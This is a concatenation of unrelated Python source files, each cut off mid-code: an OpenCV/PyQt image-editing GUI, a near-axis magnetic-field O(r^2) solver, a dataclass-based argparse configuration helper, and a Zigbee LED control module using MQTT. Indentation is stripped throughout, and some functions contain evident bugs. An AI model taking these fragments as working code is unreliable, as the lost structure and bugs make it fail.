a2, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "y value 1st point:", 0.0, -self.global_img.shape[1], self.global_img.shape[1], 1)
b1, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "x value 2nd point:", 0.0, -self.global_img.shape[0], self.global_img.shape[0], 1)
#b2, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "y value 2nd point:", 0.0, -self.global_img.shape[1], self.global_img.shape[1], 1)
c1, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "x value 3rd point:", 0.0, -self.global_img.shape[0], self.global_img.shape[0], 1)
#c2, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "y value 3rd point:", 0.0, -self.global_img.shape[1], self.global_img.shape[1], 1)
image = self.global_img
src_pts = np.float32([[0, 0], [image.shape[0] - 1, 0], [0, image.shape[1] - 1]])
dst_pts = np.float32([[a1, a2], [image.shape[0]+b1, 0], [c1, image.shape[1]]])
Mat = cv2.getAffineTransform(src_pts, dst_pts)
skewed = cv2.warpAffine(image, Mat, (image.shape[1], image.shape[0]))
self.global_img = skewed
self.displayINlebal()
def crop_fun(self):
a1, okPressed = QInputDialog.getInt(self, "enter croping points", "from row number:", 0, -self.global_img.shape[0], self.global_img.shape[0], 1)
a2, okPressed = QInputDialog.getInt(self, "enter croping points", "to row number:", 0, -self.global_img.shape[1], self.global_img.shape[1], 1)
b1, okPressed = QInputDialog.getInt(self, "enter croping points", "from col number:", 0, -self.global_img.shape[0], self.global_img.shape[0], 1)
b2, okPressed = QInputDialog.getInt(self, "enter croping points", "to col number:", 0, -self.global_img.shape[1], self.global_img.shape[1], 1)
self.global_img = self.global_img[a1:a2, b1:b2]
self.displayINlebal()
cv2.imshow("Cropped Image", self.global_img)
cv2.waitKey(0)
def scaling_fun(self):
scaleX, okPressed = QInputDialog.getInt(self, "Get scaling value", "fx Value:", 1, -self.global_img.shape[0], self.global_img.shape[0], 1)
scaleY, okPressed = QInputDialog.getInt(self, "Get scaling value", "fy Value:", 1, -self.global_img.shape[1], self.global_img.shape[1], 1)
img = self.global_img
# Reduce the image to 0.6 times the original
scaled_img = cv2.resize(img, None, fx=scaleX, fy=scaleY, interpolation=cv2.INTER_LINEAR)
self.global_img = scaled_img
self.displayINlebal()
cv2.imshow("Scaled Image", self.global_img)
cv2.waitKey(0)
def histequ_fun(self):
equ = cv2.equalizeHist(self.global_img)
self.global_img = equ
self.displayINlebal()
def trans_fun(self):
# Store height and width of the image
gray_img = self.global_img
height, width = gray_img.shape[:2]
transX, okPressed = QInputDialog.getInt(self, "Get translation value", "x Value:", 1, -self.global_img.shape[0],self.global_img.shape[0], 1)
transY, okPressed = QInputDialog.getInt(self, "Get translation value", "y Value:", 1, -self.global_img.shape[1],self.global_img.shape[1], 1)
T = np.float32([[1, 0, transX], [0, 1, transY]])
# We use warpAffine to transform
# the image using the matrix, T
trans_img = cv2.warpAffine(gray_img, T, (width, height))
self.global_img = trans_img
self.displayINlebal()
def blend_fun(self):
factor1, okPressed = QInputDialog.getDouble(self, "1st image factor:", 0.5, 0.0, 1, 0.1)
factor2, okPressed = QInputDialog.getDouble(self, "2nd image factor:", 0.5, 0.0, 1, 0.1)
flipedimage = cv2.flip(self.global_img, 0)
dst = cv2.addWeighted(flipedimage, factor1, self.global_img, factor2, 0)
self.global_img = dst
self.displayINlebal()
# # Apply log transformation method
def log_fun(self):
c = 255 / np.log(1 + np.max(self.global_img))
log_image = c * (np.log(self.global_img + 1))
log_image = np.array(log_image, dtype=np.uint8)
self.global_img = log_image
self.displayINlebal()
# # gamma correction
def gammacorrection(self):
# Apply gamma correction.
gamma, okPressed = QInputDialog.getDouble(self, "enter gamma value ", "gamma<0 = darker , gamma>0 = lighter ", 0.5, 0, 4, 3)
gamma_corrected = np.array(255 * (self.global_img / 255) ** gamma, dtype='uint8')
self.global_img = gamma_corrected
self.displayINlebal()
def threshold_fun(self):
threshvalue, okPressed = QInputDialog.getDouble(self, "thresholding ", "enter the threshold value:",1, 0, 255, 1)
ret, thresh1 = cv2.threshold(self.global_img, threshvalue, 255, cv2.THRESH_BINARY)
self.global_img = thresh1
self.displayINlebal()
# grey level slicing
def slicing_fun(self):
# Find width and height of image
row, column = self.global_img.shape
# Create an zeros array to store the sliced image
img1 = np.zeros((row, column), dtype='uint8')
# Specify the min and max range
min_range, okPressed = QInputDialog.getInt(self, "slicing data", "min range", 0, 0, 255, 1)
max_range, okPressed = QInputDialog.getInt(self, "slicing data", "max range", 0, 0, 255, 1)
# Loop over the input image and if pixel value lies in desired range set it to 255 otherwise set it to 0.
for i in range(row):
for j in range(column):
if self.global_img[i, j] > max_range:
img1[i, j] = 255
elif self.global_img[i, j] < min_range:
img1[i, j] = 0
# Display the image
self.global_img = img1
self.displayINlebal()
# this function takes the user choice and give him the filter he\she wants
def smoothing_fun(self):
items = ("Gaussian", "Averaging", "circular","pyramidal","cone","median")
item, okPressed = QInputDialog.getItem(self, "choose method", "filter:", items, 0, False)
if okPressed and item:
print(item)
if item == 'Gaussian':
print(item)
if | |
<gh_stars>1-10
"""
This module contains the calculation for the O(r^2) solution
"""
import logging
import numpy as np
from .util import mu0
#logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
def calculate_r2(self):
"""
Compute the O(r^2) quantities.
"""
logger.debug('Calculating O(r^2) terms')
# First, some shorthand:
nphi = self.nphi
B0_over_abs_G0 = self.B0 / np.abs(self.G0)
abs_G0_over_B0 = 1 / B0_over_abs_G0
X1c = self.X1c
Y1s = self.Y1s
Y1c = self.Y1c
sigma = self.sigma
d_d_varphi = self.d_d_varphi
iota_N = self.iotaN
iota = self.iota
curvature = self.curvature
torsion = self.torsion
etabar = self.etabar
B0 = self.B0
G0 = self.G0
I2 = self.I2
B2s = self.B2s
B2c = self.B2c
p2 = self.p2
sG = self.sG
spsi = self.spsi
I2_over_B0 = self.I2 / self.B0
if np.abs(iota_N) < 1e-8:
print('Warning: |iota_N| is very small so O(r^2) solve will be poorly conditioned. iota_N=', iota_N)
V1 = X1c * X1c + Y1c * Y1c + Y1s * Y1s
V2 = 2 * Y1s * Y1c
V3 = X1c * X1c + Y1c * Y1c - Y1s * Y1s
factor = - B0_over_abs_G0 / 8;
Z20 = factor*np.matmul(d_d_varphi,V1)
Z2s = factor*(np.matmul(d_d_varphi,V2) - 2 * iota_N * V3)
Z2c = factor*(np.matmul(d_d_varphi,V3) + 2 * iota_N * V2)
qs = -iota_N * X1c - Y1s * torsion * abs_G0_over_B0
qc = np.matmul(d_d_varphi,X1c) - Y1c * torsion * abs_G0_over_B0
rs = np.matmul(d_d_varphi,Y1s) - iota_N * Y1c
rc = np.matmul(d_d_varphi,Y1c) + iota_N * Y1s + X1c * torsion * abs_G0_over_B0
X2s = B0_over_abs_G0 * (np.matmul(d_d_varphi,Z2s) - 2*iota_N*Z2c + B0_over_abs_G0 * ( abs_G0_over_B0*abs_G0_over_B0*B2s/B0 + (qc * qs + rc * rs)/2)) / curvature
X2c = B0_over_abs_G0 * (np.matmul(d_d_varphi,Z2c) + 2*iota_N*Z2s - B0_over_abs_G0 * (-abs_G0_over_B0*abs_G0_over_B0*B2c/B0 \
+ abs_G0_over_B0*abs_G0_over_B0*etabar*etabar/2 - (qc * qc - qs * qs + rc * rc - rs * rs)/4)) / curvature
beta_1s = -4 * spsi * sG * mu0 * p2 * etabar * abs_G0_over_B0 / (iota_N * B0 * B0)
Y2s_from_X20 = -sG * spsi * curvature * curvature / (etabar * etabar)
Y2s_inhomogeneous = sG * spsi * (-curvature/2 + curvature*curvature/(etabar*etabar)*(-X2c + X2s * sigma))
Y2c_from_X20 = -sG * spsi * curvature * curvature * sigma / (etabar * etabar)
Y2c_inhomogeneous = sG * spsi * curvature * curvature / (etabar * etabar) * (X2s + X2c * sigma)
# Note: in the fX* and fY* quantities below, I've omitted the
# contributions from X20 and Y20 to the d/dzeta terms. These
# contributions are handled later when we assemble the large
# matrix.
fX0_from_X20 = -4 * sG * spsi * abs_G0_over_B0 * (Y2c_from_X20 * Z2s - Y2s_from_X20 * Z2c)
fX0_from_Y20 = -torsion * abs_G0_over_B0 - 4 * sG * spsi * abs_G0_over_B0 * (Z2s) \
- spsi * I2_over_B0 * (-2) * abs_G0_over_B0
fX0_inhomogeneous = curvature * abs_G0_over_B0 * Z20 - 4 * sG * spsi * abs_G0_over_B0 * (Y2c_inhomogeneous * Z2s - Y2s_inhomogeneous * Z2c) \
- spsi * I2_over_B0 * (0.5 * curvature * sG * spsi) * abs_G0_over_B0 + beta_1s * abs_G0_over_B0 / 2 * Y1c
fXs_from_X20 = -torsion * abs_G0_over_B0 * Y2s_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (Y2c_from_X20 * Z20) \
- spsi * I2_over_B0 * (- 2 * Y2s_from_X20) * abs_G0_over_B0
fXs_from_Y20 = - 4 * spsi * sG * abs_G0_over_B0 * (-Z2c + Z20)
fXs_inhomogeneous = np.matmul(d_d_varphi,X2s) - 2 * iota_N * X2c - torsion * abs_G0_over_B0 * Y2s_inhomogeneous + curvature * abs_G0_over_B0 * Z2s \
- 4 * spsi * sG * abs_G0_over_B0 * (Y2c_inhomogeneous * Z20) \
- spsi * I2_over_B0 * (0.5 * curvature * spsi * sG - 2 * Y2s_inhomogeneous) * abs_G0_over_B0 \
- (0.5) * abs_G0_over_B0 * beta_1s * Y1s
fXc_from_X20 = - torsion * abs_G0_over_B0 * Y2c_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (-Y2s_from_X20 * Z20) \
- spsi * I2_over_B0 * (- 2 * Y2c_from_X20) * abs_G0_over_B0
fXc_from_Y20 = - torsion * abs_G0_over_B0 - 4 * spsi * sG * abs_G0_over_B0 * (Z2s) \
- spsi * I2_over_B0 * (-2) * abs_G0_over_B0
fXc_inhomogeneous = np.matmul(d_d_varphi,X2c) + 2 * iota_N * X2s - torsion * abs_G0_over_B0 * Y2c_inhomogeneous + curvature * abs_G0_over_B0 * Z2c \
- 4 * spsi * sG * abs_G0_over_B0 * (-Y2s_inhomogeneous * Z20) \
- spsi * I2_over_B0 * (0.5 * curvature * sG * spsi - 2 * Y2c_inhomogeneous) * abs_G0_over_B0 \
- (0.5) * abs_G0_over_B0 * beta_1s * Y1c
fY0_from_X20 = torsion * abs_G0_over_B0 - spsi * I2_over_B0 * (2) * abs_G0_over_B0
fY0_from_Y20 = np.zeros(nphi)
fY0_inhomogeneous = -4 * spsi * sG * abs_G0_over_B0 * (X2s * Z2c - X2c * Z2s) \
- spsi * I2_over_B0 * (-0.5 * curvature * X1c * X1c) * abs_G0_over_B0 - (0.5) * abs_G0_over_B0 * beta_1s * X1c
fYs_from_X20 = -2 * iota_N * Y2c_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (Z2c)
fYs_from_Y20 = np.full(nphi, -2 * iota_N)
fYs_inhomogeneous = np.matmul(d_d_varphi,Y2s_inhomogeneous) - 2 * iota_N * Y2c_inhomogeneous + torsion * abs_G0_over_B0 * X2s \
- 4 * spsi * sG * abs_G0_over_B0 * (-X2c * Z20) - 2 * spsi * I2_over_B0 * X2s * abs_G0_over_B0
fYc_from_X20 = 2 * iota_N * Y2s_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (-Z2s)
fYc_from_Y20 = np.zeros(nphi)
fYc_inhomogeneous = np.matmul(d_d_varphi,Y2c_inhomogeneous) + 2 * iota_N * Y2s_inhomogeneous + torsion * abs_G0_over_B0 * X2c \
- 4 * spsi * sG * abs_G0_over_B0 * (X2s * Z20) \
- spsi * I2_over_B0 * (-0.5 * curvature * X1c * X1c + 2 * X2c) * abs_G0_over_B0 + 0.5 * abs_G0_over_B0 * beta_1s * X1c
matrix = np.zeros((2 * nphi, 2 * nphi))
right_hand_side = np.zeros(2 * nphi)
for j in range(nphi):
# Handle the terms involving d X_0 / d zeta and d Y_0 / d zeta:
# ----------------------------------------------------------------
# Equation 1, terms involving X0:
# Contributions arise from Y1c * fYs - Y1s * fYc.
matrix[j, 0:nphi] = Y1c[j] * d_d_varphi[j, :] * Y2s_from_X20 - Y1s[j] * d_d_varphi[j, :] * Y2c_from_X20
# Equation 1, terms involving Y0:
# Contributions arise from -Y1s * fY0 - Y1s * fYc, and they happen to be equal.
matrix[j, nphi:(2*nphi)] = -2 * Y1s[j] * d_d_varphi[j, :]
# Equation 2, terms involving X0:
# Contributions arise from -X1c * fX0 + Y1s * fYs + Y1c * fYc
matrix[j+nphi, 0:nphi] = -X1c[j] * d_d_varphi[j, :] + Y1s[j] * d_d_varphi[j, :] * Y2s_from_X20 + Y1c[j] * d_d_varphi[j, :] * Y2c_from_X20
# Equation 2, terms involving Y0:
# Contributions arise from -Y1c * fY0 + Y1c * fYc, but they happen to cancel.
# Now handle the terms involving X_0 and Y_0 without d/dzeta derivatives:
# ----------------------------------------------------------------
matrix[j, j ] = matrix[j, j ] + X1c[j] * fXs_from_X20[j] - Y1s[j] * fY0_from_X20[j] + Y1c[j] * fYs_from_X20[j] - Y1s[j] * fYc_from_X20[j]
matrix[j, j + nphi] = matrix[j, j + nphi] + X1c[j] * fXs_from_Y20[j] - Y1s[j] * fY0_from_Y20[j] + Y1c[j] * fYs_from_Y20[j] - Y1s[j] * fYc_from_Y20[j]
matrix[j + nphi, j ] = matrix[j + nphi, j ] - X1c[j] * fX0_from_X20[j] + X1c[j] * fXc_from_X20[j] - Y1c[j] * fY0_from_X20[j] + Y1s[j] * fYs_from_X20[j] + Y1c[j] * fYc_from_X20[j]
matrix[j + nphi, j + nphi] = matrix[j + nphi, j + nphi] - X1c[j] * fX0_from_Y20[j] + X1c[j] * fXc_from_Y20[j] - Y1c[j] * fY0_from_Y20[j] + Y1s[j] * fYs_from_Y20[j] + Y1c[j] * fYc_from_Y20[j]
right_hand_side[0:nphi] = -(X1c * fXs_inhomogeneous - Y1s * fY0_inhomogeneous + Y1c * fYs_inhomogeneous - Y1s * fYc_inhomogeneous)
right_hand_side[nphi:2 * nphi] = -(- X1c * fX0_inhomogeneous + X1c * fXc_inhomogeneous - Y1c * fY0_inhomogeneous + Y1s * fYs_inhomogeneous + Y1c * fYc_inhomogeneous)
solution = np.linalg.solve(matrix, right_hand_side)
X20 = solution[0:nphi]
Y20 = solution[nphi:2 * nphi]
# Now that we have X20 and Y20 explicitly, we can reconstruct Y2s, Y2c, and B20:
Y2s = Y2s_inhomogeneous + Y2s_from_X20 * X20
Y2c = Y2c_inhomogeneous + Y2c_from_X20 * X20 + Y20
B20 = B0 * (curvature * X20 - | |
import typing
from typing import Optional, Callable, Iterable, Iterator, Dict, Union
import dataclasses
import argparse
from functools import partial
import yaml
import os
__all__ = [
'confclass',
'confparam'
]
# A sentinel object to detect if a parameter is supplied or not.
# Use an empty class to give it a unique representation.
class _UNSET_TYPE:
def __copy__(self):
return self
def __deepcopy__(self, memodict={}):
return self
_UNSET = _UNSET_TYPE()
class _CONFCLASS_MARK_TYPE:
def __copy__(self):
return self
def __deepcopy__(self, memodict={}):
return self
_CONFCLASS_MARK = _CONFCLASS_MARK_TYPE()
class DefaultBoolean:
"""
Used to distinguish between an explicitly set boolean value and an unset default fallback boolean value.
"""
def __init__(self, val: bool = False):
self.val = val
def __bool__(self):
return self.val
@classmethod
def is_default(cls, val):
return isinstance(val, DefaultBoolean)
def _add_arg_prefix_to_arg_name(arg_name: str, arg_prefix: Optional[str] = None):
if arg_prefix is None or len(arg_prefix) < 1:
return arg_name
arg_name_wo_preceding_dashes = arg_name.lstrip('-')
nr_preceding_dashes = len(arg_name) - len(arg_name_wo_preceding_dashes)
preceding_dashes = "-" * nr_preceding_dashes
return f'{preceding_dashes}{arg_prefix}--{arg_name_wo_preceding_dashes}'
def _is_confclass(cls_or_instance):
return hasattr(cls_or_instance, '__is_confclass') and \
getattr(cls_or_instance, '__is_confclass') is _CONFCLASS_MARK
def _union_type_check(possible_types: Iterable[type], value: object) -> object:
for _type_candidate in possible_types:
try:
casted = _type_candidate(value)
return casted
except Exception as e:
raise argparse.ArgumentTypeError(e)
_collection_types = {list, tuple, set, frozenset} # dict, OrderedDict
def _collection_type_check(_collection_type: type, _items_types, value: object) -> object:
# TODO: fully implement and check this function.
assert _collection_type in _collection_types
return _collection_type(value)
def _typing_type_to_argparse_add_argument_kwargs(_type: type) -> Dict:
# TODO: fully implement and check this function.
kwargs = {}
if isinstance(_type, typing._GenericAlias):
if _type.__origin__ is typing.Union:
if type(None) in _type.__args__:
kwargs['required'] = False
kwargs['default'] = None
possible_types = [tp for tp in _type.__args__ if tp is not type(None)]
assert len(possible_types) > 0
if len(possible_types) == 1:
kwargs.update(_typing_type_to_argparse_add_argument_kwargs(possible_types[0]))
return kwargs
kwargs['type'] = partial(_union_type_check, possible_types)
return kwargs
if _type.__origin__ in _collection_types:
# FIXME: how does `argparse` expect to get list?
# maybe we just should set `type` to be the item type and set `nargs` to "?" or "+"?
return {'type': partial(_collection_type_check, _type.__origin__, _type.__args__)}
raise ValueError(f'Type `{_type}` is not supported by `confclass`.')
elif _type is bool:
return {'action': 'store_true'}
else:
return {'type': _type}
class ConfParam(dataclasses.Field):
description: Optional[str] = None
default_as_other_field: Optional[str] = None
default_factory_with_self_access: Optional[Callable] = None
choices: Optional[Iterable] = None
def __init__(self,
default=dataclasses.MISSING,
default_factory=dataclasses.MISSING,
init=True,
repr=True,
hash=None,
compare=True,
metadata=None,
description: Optional[str] = None,
default_as_other_field: Optional[str] = None,
default_factory_with_self_access: Optional[Callable] = None,
default_description: Optional[str] = None,
init_from_arg: Union[DefaultBoolean, bool] = DefaultBoolean(False),
arg_names: Optional[Iterable[str]] = None,
arg_prefix: Optional[str] = None,
choices: Optional[Iterable] = None):
self.description = description
self.default_as_other_field = default_as_other_field
self.default_factory_with_self_access = default_factory_with_self_access
self.default_description = default_description
self._arg_names = tuple(arg_names) if arg_names is not None else None
self.arg_prefix = arg_prefix
# Notice: In the line below it is important that `init_from_arg` is the last, so it would stay DefaultBoolean
# when everything else is False.
self.init_from_arg = bool(self._arg_names) or bool(self.arg_prefix) or init_from_arg
self.choices = list(choices) if choices is not None else None
if default_as_other_field is not None and default_factory_with_self_access is not None:
raise ValueError('Cannot set both `default_as_other_field` and `default_factory_with_self_access`.')
if default_as_other_field is not None or default_factory_with_self_access is not None:
if default is not dataclasses.MISSING or default_factory is not dataclasses.MISSING:
raise ValueError(
'Cannot set both `default` nor `default_factory` together with `default_as_other_field`'
'or with `default_factory_with_self_access`.')
# We initially set the `field.default` to an unique `_UNSET` value, which we later detect
# as the field value and re-assign a new value to this field.
default = _UNSET
super(ConfParam, self).__init__(
default=default, default_factory=default_factory, init=init,
repr=repr, hash=hash, compare=compare, metadata=metadata)
def get_arg_names(self, argname_prefix: Optional[str] = None):
arg_names = self._arg_names
if not arg_names:
arg_names = (f"--{self.name.replace('_', '-')}",)
if argname_prefix is None or len(argname_prefix) == 0:
return arg_names
return tuple(_add_arg_prefix_to_arg_name(arg_name, argname_prefix) for arg_name in arg_names)
def add_to_argparser(self, argparser: argparse.ArgumentParser, argname_prefix: Optional[str] = None):
if _is_confclass(self.type):
confclass = self.type
total_argname_prefix = None
if argname_prefix and self.arg_prefix:
total_argname_prefix = argname_prefix + '-' + self.arg_prefix
elif argname_prefix and not self.arg_prefix:
total_argname_prefix = argname_prefix
elif not argname_prefix and self.arg_prefix:
total_argname_prefix = self.arg_prefix
confclass.add_args_to_argparser(argparser, total_argname_prefix)
else:
arg_kwargs = {}
arg_names = self.get_arg_names(argname_prefix)
if self.is_arg_positional:
arg_kwargs['dest'] = self.get_arg_dest(argname_prefix)
arg_kwargs['required'] = self.is_required_as_arg
if self.description:
arg_kwargs['help'] = self.description
if self.default_description:
arg_kwargs['help'] += f' (default: {self.default_description})'
elif self.default_as_other_field is not None:
arg_kwargs['help'] += f' (default: value of `{self.default_as_other_field}`)'
elif self.default is not dataclasses.MISSING and self.default is not _UNSET:
arg_kwargs['help'] += f' (default: {self.default})'
elif self.default_factory is not dataclasses.MISSING:
arg_kwargs['help'] += f' (default: {self.default_factory()})'
if self.choices is not None:
arg_kwargs['choices'] = self.choices
# TODO: complete the rest of the possible parameters that we should pass here to `add_argument()`
# TODO: for a boolean parameter add `store_true` and `store_false` arguments.
arg_kwargs.update(_typing_type_to_argparse_add_argument_kwargs(self.type))
argparser.add_argument(
*arg_names,
**arg_kwargs)
def load_from_args(self, args: argparse.Namespace, argname_prefix: Optional[str] = None) -> object:
if _is_confclass(self.type):
confclass = self.type
total_argname_prefix = None
if argname_prefix and self.arg_prefix:
total_argname_prefix = argname_prefix + '-' + self.arg_prefix
elif argname_prefix and not self.arg_prefix:
total_argname_prefix = argname_prefix
elif not argname_prefix and self.arg_prefix:
total_argname_prefix = self.arg_prefix
return confclass.load_from_args(args, total_argname_prefix)
else:
arg_dest = self.get_arg_dest(argname_prefix)
if arg_dest in args:
return args.__getattribute__(arg_dest)
return None
def get_arg_dest(self, argname_prefix: Optional[str] = None) -> str:
return self.get_arg_names(argname_prefix)[0].strip('-').replace('-', '_')
@property
def has_default(self):
return self.default is not dataclasses.MISSING or \
self.default_factory is not dataclasses.MISSING or \
self.default_factory_with_self_access is not None or \
self.default_as_other_field is not None
@property
def is_arg_positional(self):
return all(arg_name[0] == '-' for arg_name in self.get_arg_names())
@property
def is_required_as_arg(self):
return self.init_from_arg and not self.has_default
confparam = ConfParam
def confclass(_cls,
frozen: bool = True,
init_all_from_arg_by_default: bool = True,
load_from_yaml_via_arg: bool = True):
# cls_annotations = _cls.__dict__.get('__annotations__', {})
# cls_fields = [dataclasses._get_field(_cls, name, type)
# for name, type in cls_annotations.items()]
# print('_cls annotations:', _cls.__dict__.get('__annotations__', {}))
# class _inh:
# __dict__ = _cls.__dict__
# # __class__ = _cls.__class__
# __annotations__ = _cls.__annotations__
# # a: int
# pass
# print('_cls annotations:', _cls.__dict__.get('__annotations__', {}))
# print('_inh annotations:', _inh.__dict__.get('__annotations__', {}))
# print('_cls __dict__:', _cls.__dict__)
# print('_inh __dict__:', _inh.__dict__)
# _cls = _inh
# print('_inh(_cls) annotations:', _inh.__dict__.get('__annotations__', {}))
# del _inh.__dict__['__annotations__']['a']
# _inh.__dict__['__annotations__'].update(_cls.__dict__.get('__annotations__', {}))
# object.__setattr__(_inh, '__annotations__', _cls.__dict__.get('__annotations__', {}))
# print('_inh(_cls) [after coping annotations from _cls] annotations:', _inh.__dict__.get('__annotations__', {}))
# _cls = _inh
def __set_unset_fields(_self):
for fld in dataclasses.fields(_self):
if not isinstance(fld, ConfParam):
continue
if getattr(_self, fld.name) is not _UNSET:
continue
if fld.default_factory_with_self_access is not None:
new_value = fld.default_factory_with_self_access(_self)
object.__setattr__(_self, fld.name, new_value)
elif fld.default_as_other_field is not None:
assert hasattr(_self, fld.default_as_other_field)
value = getattr(_self, fld.default_as_other_field)
assert value is not _UNSET
object.__setattr__(_self, fld.name, value)
def __verify_fields_values(_self):
pass # TODO: implement!
orig_post_init = getattr(_cls, '__post_init__', None)
def __post_init__(self):
__set_unset_fields(self)
if orig_post_init is not None:
orig_post_init(self)
__verify_fields_values(self)
setattr(_cls, '__post_init__', __post_init__)
# Create a `dataclass()` out of the _cls
# Make sure that auto created fields are from type `ConfParam` rather than `dataclasses.Field`
orig_dataclasses_field_fn = dataclasses.field
dataclasses.field = confparam
_cls = dataclasses.dataclass(_cls, frozen=frozen)
dataclasses.field = orig_dataclasses_field_fn
if init_all_from_arg_by_default:
for fld in dataclasses.fields(_cls):
if not isinstance(fld, ConfParam):
continue
if DefaultBoolean.is_default(fld.init_from_arg):
fld.init_from_arg = True
def _iter_fields_with_args(cls) -> Iterator[ConfParam]:
for fld in dataclasses.fields(cls):
if not isinstance(fld, ConfParam):
continue
if not fld.init_from_arg:
continue
yield fld
setattr(_cls, '_iter_fields_with_args', classmethod(_iter_fields_with_args))
def add_args_to_argparser(cls,
argparser: argparse.ArgumentParser,
argname_prefix: Optional[str] = None):
for fld in _iter_fields_with_args(cls):
fld.add_to_argparser(argparser, argname_prefix)
setattr(_cls, 'add_args_to_argparser', classmethod(add_args_to_argparser))
def _load_from_args(cls,
args: Optional[argparse.Namespace] = None,
argname_prefix: Optional[str] = None) -> dict:
if args is None:
argparser = argparse.ArgumentParser()
cls.add_args_to_argparser(argparser)
args = argparser.parse_args()
kwargs_to_ctor = {}
for fld in _iter_fields_with_args(cls):
value = fld.load_from_args(args, argname_prefix)
if value is not None:
kwargs_to_ctor[fld.name] = value
return kwargs_to_ctor
def load_from_args(cls,
args: Optional[argparse.Namespace] = None,
argname_prefix: Optional[str] = None):
kwargs_to_ctor = _load_from_args(cls, args, argname_prefix)
return cls(**kwargs_to_ctor)
setattr(_cls, 'load_from_args', classmethod(load_from_args))
default_hierarchy_fallback_order = frozenset({'args', 'kwargs', 'yaml'})
def factory(cls,
load_from_args: Union[argparse.Namespace, bool] = False,
load_from_yaml: Union[str, bool] = False,
argname_prefix: Optional[str] = None,
verify_confclass: bool = True,
hierarchy_fallback_order=default_hierarchy_fallback_order,
**explicit_params_to_set):
"""
Default params setting hierarchy fallback:
1. From argument
2. Explicit given as kwargs
3. From yaml
4. Default value
"""
assert set(hierarchy_fallback_order).issubset(default_hierarchy_fallback_order)
# TODO: handle differently confparams which are inner confclasses!
# they should be created iff they (or one of its inner confclasses)
# got a non-default value (from arg, explicit or yaml) for one of its params.
# TODO: allow getting dict as explicit value for an inner confclass.
# because you want to set some of its params and maybe load the | |
import math
import time
import threading
import json
from app import app
from app.database.database import *
from app.components.mqtt import MQTT_PUBLISH, CHECK_ZIGBEE2MQTT_SETTING
from app.components.email import SEND_EMAIL
""" ################### """
""" led basic functions """
""" ################### """
# This is based on original code from http://stackoverflow.com/a/22649803
def RGBtoXY(r, g, b):
def EnhanceColor(normalized):
if normalized > 0.04045:
return math.pow( (normalized + 0.055) / (1.0 + 0.055), 2.4)
else:
return normalized / 12.92
rNorm = r / 255.0
gNorm = g / 255.0
bNorm = b / 255.0
rFinal = EnhanceColor(rNorm)
gFinal = EnhanceColor(gNorm)
bFinal = EnhanceColor(bNorm)
X = rFinal * 0.649926 + gFinal * 0.103455 + bFinal * 0.197109
Y = rFinal * 0.234327 + gFinal * 0.743075 + bFinal * 0.022598
Z = rFinal * 0.000000 + gFinal * 0.053077 + bFinal * 1.035763
if X + Y + Z == 0:
return (0,0)
else:
xFinal = round( (X / (X + Y + Z)), 3 )
yFinal = round( (Y / (X + Y + Z)), 3 )
return (xFinal, yFinal)
def SET_LED_BULB_RGB(led_name, red, green, blue, brightness):
xy = RGBtoXY(int(red), int(green), int(blue))
channel = "miranda/zigbee2mqtt/" + led_name + "/set"
msg = '{"state":"ON","brightness":' + str(brightness) + ',"color": { "x":' + str(xy[0]) + ',"y":' + str(xy[1]) + '}}'
MQTT_PUBLISH(channel, msg)
time.sleep(1)
def SET_LED_BULB_WHITE(led_name, color_temp, brightness):
channel = "miranda/zigbee2mqtt/" + led_name + "/set"
msg = '{"state": "ON","brightness":' + str(brightness) + ',"color_temp":"' + str(color_temp) + '"}'
MQTT_PUBLISH(channel, msg)
time.sleep(1)
def SET_LED_BULB_SIMPLE(led_name, brightness):
channel = "miranda/zigbee2mqtt/" + led_name + "/set"
msg = '{"state": "ON","brightness":"' + str(brightness) + '"}'
MQTT_PUBLISH(channel, msg)
time.sleep(1)
def SET_LED_BULB_BRIGHTNESS(led_name, brightness):
channel = "miranda/zigbee2mqtt/" + led_name + "/set"
msg = '{"state": "ON","brightness":"' + str(brightness) + '"}'
MQTT_PUBLISH(channel, msg)
time.sleep(1)
def SET_LED_BULB_TURN_OFF(led_name):
channel = "miranda/zigbee2mqtt/" + led_name + "/set"
msg = '{"state": "OFF"}'
MQTT_PUBLISH(channel, msg)
time.sleep(1)
""" ####################### """
""" led group check setting """
""" ####################### """
def CHECK_LED_GROUP_SETTING_THREAD(group_id, scene_id, scene, brightness, delay, limit):
Thread = threading.Thread(target=CHECK_LED_GROUP_SETTING_PROCESS, args=(group_id, scene_id, scene, brightness, delay, limit, ))
Thread.start()
def CHECK_LED_GROUP_SETTING_PROCESS(group_id, scene_id, scene, brightness, delay, limit):
if scene == "OFF":
setting = '{"state":"OFF"}'
else:
setting = '{"state":"ON"}'
# check setting 1 try
time.sleep(delay)
result = CHECK_LED_GROUP_SETTING(group_id, scene_id, setting, limit)
# set current state
if result == []:
SET_LED_GROUP_CURRENT_SETTING(group_id, scene)
SET_LED_GROUP_CURRENT_BRIGHTNESS(group_id, brightness)
else:
# check setting 2 try
time.sleep(delay)
result = CHECK_LED_GROUP_SETTING(group_id, scene_id, setting, limit)
# set current state
if result == []:
SET_LED_GROUP_CURRENT_SETTING(group_id, scene)
SET_LED_GROUP_CURRENT_BRIGHTNESS(group_id, brightness)
else:
# check setting 3 try
time.sleep(delay)
result = CHECK_LED_GROUP_SETTING(group_id, scene_id, setting, limit)
# output
SET_LED_GROUP_CURRENT_SETTING(group_id, scene)
SET_LED_GROUP_CURRENT_BRIGHTNESS(group_id, brightness)
group_name = GET_LED_GROUP_BY_ID(group_id).name
if result == []:
WRITE_LOGFILE_SYSTEM("SUCCESS", "LED | Group - " + group_name + " | Setting changed | " + str(scene) + " : " + str(brightness) + " %")
else:
WRITE_LOGFILE_SYSTEM("WARNING", "LED | Group - " + group_name + " | " + str(scene) + " : " + str(brightness) + " | " + str(result))
SEND_EMAIL("WARNING", "LED | Group - " + group_name + " | " + str(scene) + " : " + str(brightness) + " | " + str(result))
return result
def CHECK_LED_GROUP_SETTING(group_id, scene_id, setting, limit):
if GET_GLOBAL_SETTING_VALUE("zigbee2mqtt") == "True":
error_list = []
try:
group = GET_LED_GROUP_BY_ID(group_id)
# group isn't offline
if scene_id != 0:
